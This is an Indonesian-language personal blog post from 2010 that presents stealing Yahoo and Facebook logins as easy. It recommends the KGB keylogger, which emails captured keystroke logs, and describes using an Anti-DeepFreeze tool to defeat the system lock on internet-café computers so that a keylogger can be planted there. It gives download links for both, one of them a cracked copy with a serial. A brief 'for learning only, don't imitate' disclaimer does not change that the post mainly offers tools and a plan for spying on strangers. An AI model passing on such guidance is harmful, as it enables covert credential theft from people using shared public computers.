Welcome to my blog :)

rss

Sabtu, 06 Maret 2010

Siapa bilang Hack e-mail Yahoo dan Facebook itu susah??


sebenarnya sih gw ga mau ngeposting ini postingan... tp tolong jgn dipraktekkan yaaa...ini hanya utk pembelajaran ajaahhh.. gw mw sharing beberapa tools hacking ,, diantaranya keylogger!!! temen2 udah pada tahu kan keylogger itu apa??jd kesimpulannya keylogger itu untuk mencatat seluruh kegiatan yg ada di komputer yg sudah ditanam keylogger..dan datanya akan dikirimkan melalui email..tidak semuanya keylogger bisa menyediakan fitur pengiriman data melalui e-mail..tp keylogger yg bernama KGB keylogger,, data tsb..bisa dikirimkan ke e-mail seseorang dalam bentuk file log..tentunya temen2 udah pada tahu dong!!! 

btw..temen2 tahu DeepFreeze?ya benar....software tsb. merupakan software pengunci sistem suatu komputer.. lalu software ini memang dipakai di komputer2 warnet,, mustahil suatu warnet tidak ada DFnya... tapi apa jadinya kalau DF tsb. bisa dibobol dan ditanami keylogger??di dunia ini segalanya tidak ada yg tidak mungkin..semuanya bisa terjadi,, ya betul sekali....software utk membobol DF adalah Anti-DF. tentunya temen2 udah pada tahu dong apa itu Anti-DF..
Berikut gw kasih software KGB keylogger dan Anti-DF :
1) http://www.ziddu.com/download/7763407/KGBKeyLogger4.5.4Serial.rar.html
2) http://www.d60pc.com/2009/10/19/anti-deep-freeze-v01/

untuk yg no.2 itu anti-DF...tentunya temen2 udah pada tahu kan cara penggunaannya?? jadi tolong ini hanya utk pembelajaran saja... saya tidak akan bertanggung jawab apabila ente semua terjerat undang-undang ITE...sekali lagi ane tegaskan..... JANGAN DITIRU!!! BERBAHAYA!!!!







0 komentar:

Posting Komentar